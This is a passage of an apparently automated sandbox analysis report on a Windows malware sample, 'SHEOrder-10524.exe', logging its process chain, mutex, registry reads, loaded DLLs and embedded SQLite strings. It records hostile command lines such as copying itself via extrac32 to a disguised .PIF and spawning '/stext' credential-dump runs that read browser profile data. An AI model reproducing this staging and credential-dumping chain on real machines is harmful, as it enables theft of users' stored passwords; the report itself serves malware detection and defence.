                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCode function: 4_2_0040F474 GetModuleFileNameW,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,CloseHandle,4_2_0040F474
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeCode function: 0_2_028D6D84 CoCreateInstance,0_2_028D6D84
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCode function: 4_2_0041B4A8 FindResourceA,LoadResource,LockResource,SizeofResource,4_2_0041B4A8
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCode function: 4_2_0041AA4A OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,4_2_0041AA4A
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeFile created: C:\Users\Public\Libraries\NullJump to behavior
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifMutant created: \Sessions\1\BaseNamedObjects\Rmc-V052BG
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7376:120:WilError_03
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifFile created: C:\Users\user\AppData\Local\Temp\bhv1938.tmpJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\WagotghlO.bat" "
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCommand line argument: PG4_2_0040E9C5
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCommand line argument: PG4_2_0040E9C5
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCommand line argument: Software\4_2_0040E9C5
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCommand line argument: Rmc-V052BG4_2_0040E9C5
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCommand line argument: Exe4_2_0040E9C5
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCommand line argument: Exe4_2_0040E9C5
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCommand line argument: Rmc-V052BG4_2_0040E9C5
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCommand line argument: Inj4_2_0040E9C5
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCommand line argument: Inj4_2_0040E9C5
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCommand line argument: PG4_2_0040E9C5
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCommand line argument: PG4_2_0040E9C5
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCommand line argument: PG4_2_0040E9C5
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCommand line argument: 8SG4_2_0040E9C5
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCommand line argument: exepath4_2_0040E9C5
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCommand line argument: PG4_2_0040E9C5
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCommand line argument: 8SG4_2_0040E9C5
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCommand line argument: exepath4_2_0040E9C5
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCommand line argument: PG4_2_0040E9C5
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCommand line argument: licence4_2_0040E9C5
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCommand line argument: PG4_2_0040E9C5
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCommand line argument: PG4_2_0040E9C5
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCommand line argument: PG4_2_0040E9C5
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCommand line argument: PG4_2_0040E9C5
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCommand line argument: PG4_2_0040E9C5
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCommand line argument: PG4_2_0040E9C5
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCommand line argument: dMG4_2_0040E9C5
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCommand line argument: PG4_2_0040E9C5
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCommand line argument: PG4_2_0040E9C5
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCommand line argument: PSG4_2_0040E9C5
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCommand line argument: Administrator4_2_0040E9C5
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCommand line argument: User4_2_0040E9C5
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCommand line argument: del4_2_0040E9C5
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCommand line argument: del4_2_0040E9C5
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCommand line argument: del4_2_0040E9C5
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCommand line argument: PG4_2_0040E9C5
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCommand line argument: PG4_2_0040E9C5
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCommand line argument: Software\4_2_0040E9C5
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCommand line argument: Rmc-V052BG4_2_0040E9C5
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCommand line argument: Exe4_2_0040E9C5
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCommand line argument: Exe4_2_0040E9C5
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCommand line argument: Rmc-V052BG4_2_0040E9C5
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCommand line argument: Inj4_2_0040E9C5
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCommand line argument: Inj4_2_0040E9C5
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCommand line argument: PG4_2_0040E9C5
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCommand line argument: PG4_2_0040E9C5
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCommand line argument: PG4_2_0040E9C5
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCommand line argument: 8SG4_2_0040E9C5
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCommand line argument: exepath4_2_0040E9C5
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCommand line argument: PG4_2_0040E9C5
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCommand line argument: 8SG4_2_0040E9C5
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCommand line argument: exepath4_2_0040E9C5
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCommand line argument: PG4_2_0040E9C5
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCommand line argument: licence4_2_0040E9C5
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCommand line argument: PG4_2_0040E9C5
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCommand line argument: PG4_2_0040E9C5
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCommand line argument: PG4_2_0040E9C5
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCommand line argument: PG4_2_0040E9C5
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCommand line argument: PG4_2_0040E9C5
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCommand line argument: PG4_2_0040E9C5
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCommand line argument: dMG4_2_0040E9C5
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCommand line argument: PG4_2_0040E9C5
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCommand line argument: PG4_2_0040E9C5
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCommand line argument: PSG4_2_0040E9C5
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCommand line argument: Administrator4_2_0040E9C5
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCommand line argument: User4_2_0040E9C5
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCommand line argument: del4_2_0040E9C5
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCommand line argument: del4_2_0040E9C5
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCommand line argument: del4_2_0040E9C5
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCommand line argument: PG4_1_0040E9C5
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCommand line argument: PG4_1_0040E9C5
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCommand line argument: Software\4_1_0040E9C5
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCommand line argument: Rmc-V052BG4_1_0040E9C5
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCommand line argument: Exe4_1_0040E9C5
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCommand line argument: Exe4_1_0040E9C5
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCommand line argument: Rmc-V052BG4_1_0040E9C5
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCommand line argument: Inj4_1_0040E9C5
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCommand line argument: Inj4_1_0040E9C5
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCommand line argument: PG4_1_0040E9C5
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCommand line argument: PG4_1_0040E9C5
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCommand line argument: PG4_1_0040E9C5
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCommand line argument: 8SG4_1_0040E9C5
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCommand line argument: exepath4_1_0040E9C5
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCommand line argument: PG4_1_0040E9C5
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCommand line argument: 8SG4_1_0040E9C5
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCommand line argument: exepath4_1_0040E9C5
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCommand line argument: PG4_1_0040E9C5
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCommand line argument: licence4_1_0040E9C5
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCommand line argument: PG4_1_0040E9C5
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCommand line argument: PG4_1_0040E9C5
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCommand line argument: PG4_1_0040E9C5
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCommand line argument: PG4_1_0040E9C5
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCommand line argument: PG4_1_0040E9C5
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCommand line argument: PG4_1_0040E9C5
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCommand line argument: dMG4_1_0040E9C5
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCommand line argument: PG4_1_0040E9C5
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCommand line argument: PG4_1_0040E9C5
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCommand line argument: PSG4_1_0040E9C5
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCommand line argument: Administrator4_1_0040E9C5
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCommand line argument: User4_1_0040E9C5
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCommand line argument: del4_1_0040E9C5
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCommand line argument: del4_1_0040E9C5
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCommand line argument: del4_1_0040E9C5
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                  Source: C:\Users\Public\Libraries\Wagotghl.PIFKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                  Source: C:\Users\Public\Libraries\Wagotghl.PIFKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                  Source: C:\Users\Public\Libraries\Wagotghl.PIFKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                  Source: C:\Users\Public\Libraries\Wagotghl.PIFKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifSystem information queried: HandleInformationJump to behavior
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: lhgtogaW.pif, lhgtogaW.pif, 00000005.00000002.1794572867.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
                  Source: lhgtogaW.pif, lhgtogaW.pif, 00000005.00000002.1794572867.0000000000400000.00000040.80000000.00040000.00000000.sdmp, lhgtogaW.pif, 00000006.00000002.1779576996.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
                  Source: lhgtogaW.pif, 00000004.00000002.4156997111.00000000273A0000.00000040.10000000.00040000.00000000.sdmp, lhgtogaW.pif, 00000005.00000002.1794572867.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
                  Source: lhgtogaW.pif, lhgtogaW.pif, 00000005.00000002.1794572867.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
                  Source: lhgtogaW.pif, lhgtogaW.pif, 00000005.00000002.1794572867.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
                  Source: lhgtogaW.pif, lhgtogaW.pif, 00000005.00000002.1794572867.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
                  Source: lhgtogaW.pif, 00000005.00000003.1793696078.000000000220C000.00000004.00000020.00020000.00000000.sdmp, lhgtogaW.pif, 00000005.00000002.1795170664.000000000220C000.00000004.00000020.00020000.00000000.sdmp, lhgtogaW.pif, 00000005.00000003.1794124501.000000000220C000.00000004.00000020.00020000.00000000.sdmp, lhgtogaW.pif, 00000005.00000003.1793767154.000000000220C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                  Source: lhgtogaW.pif, lhgtogaW.pif, 00000005.00000002.1794572867.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
                  Source: SHEOrder-10524.exeReversingLabs: Detection: 47%
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeFile read: C:\Users\user\Desktop\SHEOrder-10524.exeJump to behavior
                  Source: unknownProcess created: C:\Users\user\Desktop\SHEOrder-10524.exe "C:\Users\user\Desktop\SHEOrder-10524.exe"
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\WagotghlO.bat" "
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeProcess created: C:\Windows\SysWOW64\extrac32.exe C:\\Windows\\System32\\extrac32.exe /C /Y C:\Users\user\Desktop\SHEOrder-10524.exe C:\\Users\\Public\\Libraries\\Wagotghl.PIF
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeProcess created: C:\Users\Public\Libraries\lhgtogaW.pif C:\Users\Public\Libraries\lhgtogaW.pif
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifProcess created: C:\Users\Public\Libraries\lhgtogaW.pif C:\Users\Public\Libraries\lhgtogaW.pif /stext "C:\Users\user\AppData\Local\Temp\zhrdpmieysz"
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifProcess created: C:\Users\Public\Libraries\lhgtogaW.pif C:\Users\Public\Libraries\lhgtogaW.pif /stext "C:\Users\user\AppData\Local\Temp\kbfnqftxmarjte"
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifProcess created: C:\Users\Public\Libraries\lhgtogaW.pif C:\Users\Public\Libraries\lhgtogaW.pif /stext "C:\Users\user\AppData\Local\Temp\mekgrxezaijovlxyi"
                  Source: unknownProcess created: C:\Users\Public\Libraries\Wagotghl.PIF "C:\Users\Public\Libraries\Wagotghl.PIF"
                  Source: C:\Users\Public\Libraries\Wagotghl.PIFProcess created: C:\Users\Public\Libraries\lhgtogaW.pif C:\Users\Public\Libraries\lhgtogaW.pif
                  Source: unknownProcess created: C:\Users\Public\Libraries\Wagotghl.PIF "C:\Users\Public\Libraries\Wagotghl.PIF"
                  Source: C:\Users\Public\Libraries\Wagotghl.PIFProcess created: C:\Users\Public\Libraries\lhgtogaW.pif C:\Users\Public\Libraries\lhgtogaW.pif
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\WagotghlO.bat" "Jump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeProcess created: C:\Windows\SysWOW64\extrac32.exe C:\\Windows\\System32\\extrac32.exe /C /Y C:\Users\user\Desktop\SHEOrder-10524.exe C:\\Users\\Public\\Libraries\\Wagotghl.PIFJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeProcess created: C:\Users\Public\Libraries\lhgtogaW.pif C:\Users\Public\Libraries\lhgtogaW.pifJump to behavior
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifProcess created: C:\Users\Public\Libraries\lhgtogaW.pif C:\Users\Public\Libraries\lhgtogaW.pif /stext "C:\Users\user\AppData\Local\Temp\zhrdpmieysz"Jump to behavior
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifProcess created: C:\Users\Public\Libraries\lhgtogaW.pif C:\Users\Public\Libraries\lhgtogaW.pif /stext "C:\Users\user\AppData\Local\Temp\kbfnqftxmarjte"Jump to behavior
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifProcess created: C:\Users\Public\Libraries\lhgtogaW.pif C:\Users\Public\Libraries\lhgtogaW.pif /stext "C:\Users\user\AppData\Local\Temp\mekgrxezaijovlxyi"Jump to behavior
                  Source: C:\Users\Public\Libraries\Wagotghl.PIFProcess created: C:\Users\Public\Libraries\lhgtogaW.pif C:\Users\Public\Libraries\lhgtogaW.pifJump to behavior
                  Source: C:\Users\Public\Libraries\Wagotghl.PIFProcess created: C:\Users\Public\Libraries\lhgtogaW.pif C:\Users\Public\Libraries\lhgtogaW.pif
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: url.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ieframe.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: netapi32.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: wkscli.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: endpointdlp.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: eamsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: smartscreenps.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: am.dllJump to behavior
